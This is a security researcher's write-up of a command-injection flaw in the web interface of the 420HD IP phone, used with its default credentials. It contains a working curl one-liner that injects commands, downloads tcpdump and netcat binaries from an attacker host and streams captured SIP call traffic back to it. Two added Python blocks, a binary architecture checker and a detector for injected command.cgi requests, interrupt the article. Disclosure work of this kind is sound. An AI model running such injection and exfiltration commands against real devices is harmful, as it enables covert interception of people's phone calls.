Introduction

In March 2018, Sysdream discovered several vulnerabilities in the 420HD IP phone (firmware version: 2.2.12.126). All of them have been published and assigned a CVE identifier:

In this article, we will focus on the RCE vulnerability.

A Remote Command Execution is always interesting to find during a penetration test, as it usually provides a system shell on the vulnerable asset, often with high privileges.

Finding this vulnerability on an IP phone may seem rather useless at first, since these devices usually do not store interesting data.

Nevertheless, they do process and transmit really interesting data: phone calls.

The idea behind our exploitation attempts was to illustrate the risk by exploiting the phone itself, without tampering with the network (as an ARP cache poisoning attack would), which is also stealthier.

RCE discovery and exploitation

Vulnerability discovery

The prerequisite for identifying and exploiting this flaw is to have valid credentials for the web management interface.

Like many network devices, this one ships with default credentials, which in practice are often left unchanged.

We could use the following credentials (documented in the manual), admin:1234:

Once authenticated on the web interface, we have access to monitoring and diagnostics features:

The web page lets us view the output of ps, top and cat /proc/meminfo.

By tampering with the parameter passed to the command.cgi page, we are able to execute arbitrary system commands:

Having fun with phone call spying

The good news is that we have root privileges on the system:

The bad news is that we are in a restricted shell, BusyBox:

As a brief reminder, BusyBox is a single binary that bundles the main Unix commands. It is often found in embedded devices.

Depending on the version used, more or fewer commands are available to interact with the operating system. Unfortunately, this one is quite limited: there is no netcat, python or perl, and some well-known binaries such as wget come in restricted versions.

Nevertheless, by running cat /proc/cpuinfo we find out which architecture the phone uses:

Thus, the phone is based on the MIPS architecture.

It is possible to use Metasploit to upload an interactive shell for this architecture, but that does not offer any extra feature.

So, we decided to look for other MIPS (little endian) binaries on the Internet. We found two in particular:
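Before trusting a binary found on the Internet to match the architecture reported by /proc/cpuinfo, it is worth checking what it was actually built for. The following is an added example, not code from the article or from Sysdream: it decodes word size, byte order and machine from the first 20 bytes of an ELF header, so a MIPS big-endian or x86-64 build is rejected before it is copied anywhere. The sample headers are constructed test data, not real binaries.

```python
# Added example, not part of the article: the check one runs on a downloaded
# or extracted binary before assuming it matches the target reported by
# /proc/cpuinfo. It reads the first 20 bytes of an ELF header and reports
# word size, byte order and machine. The sample headers are constructed.
import struct
from typing import Dict

ELF_MAGIC = b"\x7fELF"
ELFCLASS32, ELFCLASS64 = 1, 2          # e_ident[EI_CLASS]
ELFDATA2LSB, ELFDATA2MSB = 1, 2        # e_ident[EI_DATA]
# Subset of e_machine values from the ELF specification (<elf.h>)
E_MACHINE = {3: "x86", 8: "MIPS", 40: "ARM", 62: "x86-64", 183: "AArch64", 243: "RISC-V"}
E_TYPE = {1: "REL", 2: "EXEC", 3: "DYN", 4: "CORE"}


def elf_target(header: bytes) -> Dict[str, object]:
    """Decode word size, endianness, machine and object type from an ELF header."""
    if len(header) < 20 or header[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    ei_class, ei_data = header[4], header[5]
    if ei_class not in (ELFCLASS32, ELFCLASS64) or ei_data not in (ELFDATA2LSB, ELFDATA2MSB):
        raise ValueError("malformed e_ident")
    # e_type (offset 16) and e_machine (offset 18) are 16-bit fields stored
    # in the byte order that e_ident[EI_DATA] announces.
    order = "<" if ei_data == ELFDATA2LSB else ">"
    e_type, e_machine = struct.unpack(order + "HH", header[16:20])
    return {
        "bits": 32 if ei_class == ELFCLASS32 else 64,
        "endian": "little" if ei_data == ELFDATA2LSB else "big",
        "machine": E_MACHINE.get(e_machine, f"unknown({e_machine})"),
        "type": E_TYPE.get(e_type, f"unknown({e_type})"),
    }


def matches_target(header: bytes, machine: str = "MIPS", endian: str = "little", bits: int = 32) -> bool:
    """True when the binary was built for the given machine, byte order and word size."""
    info = elf_target(header)
    return info["machine"] == machine and info["endian"] == endian and info["bits"] == bits


def elf_target_of_file(path: str) -> Dict[str, object]:
    """Same check on a file on disk; only the header is read."""
    with open(path, "rb") as handle:
        return elf_target(handle.read(20))


def make_header(bits: int, little: bool, e_type: int, e_machine: int) -> bytes:
    """Build a minimal 20-byte ELF header (constructed test data, not a real binary)."""
    e_ident = ELF_MAGIC + bytes([ELFCLASS32 if bits == 32 else ELFCLASS64,
                                 ELFDATA2LSB if little else ELFDATA2MSB, 1]) + b"\x00" * 9
    return e_ident + struct.pack(("<" if little else ">") + "HH", e_type, e_machine)


# Constructed headers: what the phone needs, the same CPU family in the wrong
# byte order, and a desktop build that would not run at all.
MIPSEL_EXEC = make_header(32, True, 2, 8)
MIPSEB_EXEC = make_header(32, False, 2, 8)
X86_64_DYN = make_header(64, True, 3, 62)

if __name__ == "__main__":
    for label, header in (("mipsel", MIPSEL_EXEC), ("mipseb", MIPSEB_EXEC), ("x86-64", X86_64_DYN)):
        print(label, elf_target(header), "ok" if matches_target(header) else "wrong target")
```

On a real file, elf_target_of_file("/path/to/binary") gives the same dictionary that the constructed headers produce here; the output of file(1) reports the same fields, but doing it in code lets the check sit in a build or deployment script.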

Now, we can use tcpdump to capture the SIP traffic and netcat to forward it to the attacker's machine.

The one-liner exploit looks like this:

curl -v --user 'admin:1234' 'http://10.89.7.48/command.cgi?ps|wget http://10.89.6.190:8000/tcpdump -P /tmp%26%26wget http://10.89.6.190:8000/busybox-mipsel -P /tmp%26%26chmod %2Bx /tmp/tcpdump%26%26chmod %2Bx /tmp/busybox-mipsel%26%26/tmp/tcpdump -n -i any udp -w -|/tmp/busybox-mipsel nc 10.89.6.190 10000'
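The root cause behind command.cgi, as described above, is a handler that hands a user-controlled parameter to a shell, and the one-liner shows what that looks like on the wire once the pipes and double ampersands are percent-encoded. The following added example (not Sysdream's code and not the phone's firmware) shows the two things a defender wants: a hardened handler that only runs a fixed argv for an allowlisted diagnostic name, without a shell, and a detector that decodes access-log requests to command.cgi and flags any query that is not one of those names. The diagnostic names, the log format and the log lines are constructed assumptions.

```python
# Added example, written for this page: it is neither Sysdream's code nor the
# phone's firmware. The flaw behind command.cgi is a handler that hands a
# user-controlled parameter to a shell. Below: a hardened handler that only
# runs a fixed argv for an allowlisted diagnostic name, plus a detector that
# flags access-log requests whose command.cgi query is anything else.
# The diagnostic names, log format and log lines are constructed assumptions.
import subprocess
from typing import Callable, Dict, List, Optional, Tuple
from urllib.parse import unquote, urlsplit

# Fixed argv per diagnostic: the client picks a name, never a command line.
ALLOWED_COMMANDS: Dict[str, List[str]] = {
    "ps": ["ps"],
    "top": ["top", "-b", "-n", "1"],
    "meminfo": ["cat", "/proc/meminfo"],
}

# Tokens that only make sense if the query is meant to reach a shell.
SHELL_METACHARS = ("|", "&", ";", "`", "$(", "\n", ">", "<")


def run_diagnostic(name: str, runner: Callable = subprocess.run):
    """Hardened handler: unknown names are refused, and the fixed argv is
    passed without a shell, so metacharacters carry no meaning."""
    argv = ALLOWED_COMMANDS.get(name)
    if argv is None:
        raise ValueError(f"unknown diagnostic: {name!r}")
    return runner(argv, shell=False, capture_output=True, text=True, timeout=10)


def flag_command_cgi(log_line: str) -> Optional[Tuple[str, str]]:
    """Return (decoded query, reason) for a command.cgi request that is not a
    plain allowlisted name, or None. Input: one combined-format access-log line."""
    parts = log_line.split('"')
    if len(parts) < 3:
        return None
    request = parts[1].split()              # e.g. GET /command.cgi?ps HTTP/1.1
    if len(request) < 2:
        return None
    target = urlsplit(request[1])
    if not target.path.endswith("/command.cgi"):
        return None
    query = unquote(target.query)           # undo %7C, %26, %2B, %20 ...
    if query in ALLOWED_COMMANDS:
        return None
    if any(token in query for token in SHELL_METACHARS):
        return query, "shell metacharacters in command.cgi query"
    return query, "query is not an allowlisted diagnostic name"


def scan_log(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Run the detector over a log and return (line index, query, reason) hits."""
    hits = []
    for index, line in enumerate(lines):
        result = flag_command_cgi(line)
        if result is not None:
            hits.append((index, result[0], result[1]))
    return hits


# Constructed access-log lines: two legitimate diagnostics, one injected
# pipeline (percent-encoded as a browser or curl would send it), one unrelated.
SAMPLE_LOG = [
    '10.0.0.5 - admin [12/Mar/2018:10:00:01 +0100] "GET /command.cgi?ps HTTP/1.1" 200 512',
    '10.0.0.5 - admin [12/Mar/2018:10:00:09 +0100] "GET /command.cgi?meminfo HTTP/1.1" 200 900',
    '10.0.0.9 - admin [12/Mar/2018:10:02:33 +0100] "GET /command.cgi?ps%7Cwget%20http://203.0.113.5/x%20-P%20/tmp HTTP/1.1" 200 0',
    '10.0.0.9 - admin [12/Mar/2018:10:02:40 +0100] "GET /index.html HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for index, query, reason in scan_log(SAMPLE_LOG):
        print(f"line {index}: {reason}: {query}")
```

The detector decodes the query before matching, because the encoded form (%26%26, %7C) is exactly what a web server log stores for the one-liner above; matching on the raw string would miss it. The handler takes its runner as a parameter only so that it can be exercised without executing anything.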

We can use Wireshark to see the call in progress:

Then, still with Wireshark, we can replay the phone call:

To watch it live with more details and fun, please check our PoC video:

Author

Anthony BAUBE <a.baube -at- sysdream.com>

Acknowledgements

Thank you to Antoine Morin <a.morin -at- sysdream.com> for his assistance and thank you to the other Sysdream consultants for your helpful ideas and support. :)